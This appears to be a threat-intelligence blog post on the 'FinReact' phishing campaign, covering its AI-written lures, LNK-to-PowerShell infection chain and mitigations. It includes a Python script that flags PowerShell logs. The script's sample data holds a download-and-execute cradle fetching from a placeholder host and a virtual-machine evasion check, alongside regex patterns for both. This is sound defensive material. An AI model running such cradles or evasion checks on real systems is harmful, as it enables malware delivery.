Security researchers at Proofpoint have identified a sophisticated, large-scale phishing campaign, 'FinReact', targeting the financial services sector. This operation is notable for its use of generative AI to craft highly convincing and personalized email lures, making them difficult to detect. The campaign's goal is to deploy information-stealing malware, such as Vidar and IcedID, by tricking victims into executing a malicious LNK file. This triggers a multi-stage infection process involving a new, evasive JavaScript loader named GhostScript. The campaign demonstrates a significant evolution in the tactics of financially motivated cybercriminals.
The 'FinReact' campaign represents a significant step up in the quality of phishing attacks. By leveraging generative AI, the attackers can create emails that are grammatically perfect, contextually relevant, and personalized to the target, often appearing as a reply to an existing email thread.
The GhostScript loader is a key component of this campaign. It is a novel piece of malware designed for evasion. Its ability to check for virtualized environments before proceeding makes it difficult for automated analysis systems to detonate and study the final payload. This ensures the attackers' more valuable malware (the info-stealers) is only exposed in real victim environments.
The use of AI for lure creation is the other major innovation. This allows the attackers to scale their operation without sacrificing quality, producing thousands of unique, high-quality phishing emails that can bypass reputation-based and signature-based email security filters.
T1566.001 - Spearphishing Attachment - The ZIP file attached to the email.
T1204.002 - Malicious File - The user is tricked into clicking the LNK file.
T1059.001 - PowerShell - The LNK file executes a PowerShell download cradle.
T1622 - Debugger Evasion - The GhostScript loader performs anti-analysis checks.
T1059.007 - JavaScript - The GhostScript loader itself is JavaScript-based.
T1555 - Credentials from Password Stores - The final payload (Vidar/IcedID) steals credentials from browsers and other applications.
A successful compromise can have significant financial and operational consequences for the targeted firms:
Process analysis is key here.
Training users to recognize phishing indicators, especially those involving unusual attachments like password-protected ZIPs, is the first line of defense.
Using Attack Surface Reduction (ASR) rules or application control to block the execution of scripts and LNK files from email can prevent the infection chain from starting.
Modern EDR/AV solutions with behavioral analysis can detect and block suspicious activities like an LNK file launching PowerShell to download a payload.
Email gateways should be configured to scan and potentially block or quarantine password-protected archives, which are a common malware delivery technique.
Given the use of sophisticated AI-generated lures, technical controls alone may not be sufficient. A robust, ongoing security awareness training program is essential. For the financial sector employees targeted by FinReact, this training should specifically focus on the TTP of receiving password-protected ZIP files with the password in the email body. Phishing simulations that mimic this exact technique should be conducted regularly to condition users to recognize and report such emails rather than opening the attachments. A well-trained user is the most effective sensor for detecting high-quality phishing attempts.
Implement application control policies to prevent the execution of unexpected scripts and files. Specifically, configure Windows Attack Surface Reduction (ASR) rules to block the execution of LNK files and to prevent scripts from launching downloaded content. For example, the ASR rule 'Block execution of potentially obfuscated scripts' can interfere with the GhostScript loader. A more stringent approach is to use a tool like AppLocker to deny the execution of LNK files and scripts from user-writable locations like the Downloads folder or AppData, which would break the FinReact infection chain at its earliest stage.
Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) across all endpoints via Group Policy. The FinReact campaign uses a malicious LNK file to launch a PowerShell download cradle. While the initial command might be simple, detailed logging will capture the full content of any de-obfuscated scripts or further commands executed in memory. This provides invaluable forensic data for incident response and can be fed into a SIEM to create high-fidelity alerts for suspicious PowerShell activity, such as download cradles or anti-analysis checks.
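Detection logic of the kind described above, as an added example that is not from Proofpoint or the original article: it reassembles fragmented Event ID 4104 script blocks (Script Block Logging splits long scripts into numbered fragments that share a ScriptBlockId) and flags download-cradle and VM-check patterns. The event records are constructed samples, not FinReact telemetry; the field names (ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText) are the real 4104 properties, while the regex lists are an illustrative starting point rather than a complete signature set.

```python
import re
from collections import defaultdict

# Constructed sample 4104 records (not real telemetry). Block "a1" arrives as two
# fragments; "c3" mimics a virtual-machine check of the kind the article describes.
SAMPLE_4104 = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$c = New-Object Net.WebClient; "},
    {"ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "IEX $c.DownloadString('http://example.invalid/stage2')"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "if ((Get-WmiObject Win32_ComputerSystem).Manufacturer "
                        "-match 'VMware|VirtualBox') { exit }"},
]

# Illustrative indicator lists (assumption: tune these to your environment).
CRADLE = [r"Net\.WebClient", r"DownloadString|DownloadFile",
          r"Invoke-WebRequest|\biwr\b", r"Invoke-Expression|\bIEX\b",
          r"FromBase64String"]
ANTI_ANALYSIS = [r"Win32_ComputerSystem", r"VMware|VirtualBox|QEMU"]


def reassemble(events):
    """Join fragments per ScriptBlockId in MessageNumber order; skip incomplete blocks."""
    parts, totals = defaultdict(dict), {}
    for e in events:
        parts[e["ScriptBlockId"]][e["MessageNumber"]] = e["ScriptBlockText"]
        totals[e["ScriptBlockId"]] = e["MessageTotal"]
    return {sbid: "".join(frags[i] for i in sorted(frags))
            for sbid, frags in parts.items() if len(frags) == totals[sbid]}


def classify(script):
    """Return ('alert'|'ok', matched indicators) for one reassembled script block."""
    hits = {"cradle": [p for p in CRADLE if re.search(p, script, re.I)],
            "anti_analysis": [p for p in ANTI_ANALYSIS if re.search(p, script, re.I)]}
    # Require two cradle indicators (fetch + execute) so a plain download alone is not noise.
    verdict = "alert" if len(hits["cradle"]) >= 2 or hits["anti_analysis"] else "ok"
    return verdict, hits


def triage(events):
    """Map each complete ScriptBlockId to its verdict, ready to forward to a SIEM."""
    return {sbid: classify(s)[0] for sbid, s in reassemble(events).items()}
```

Fragment reassembly matters in practice: matching on a single 4104 fragment would miss block "a1", whose fetch and execute halves land in different events.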

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.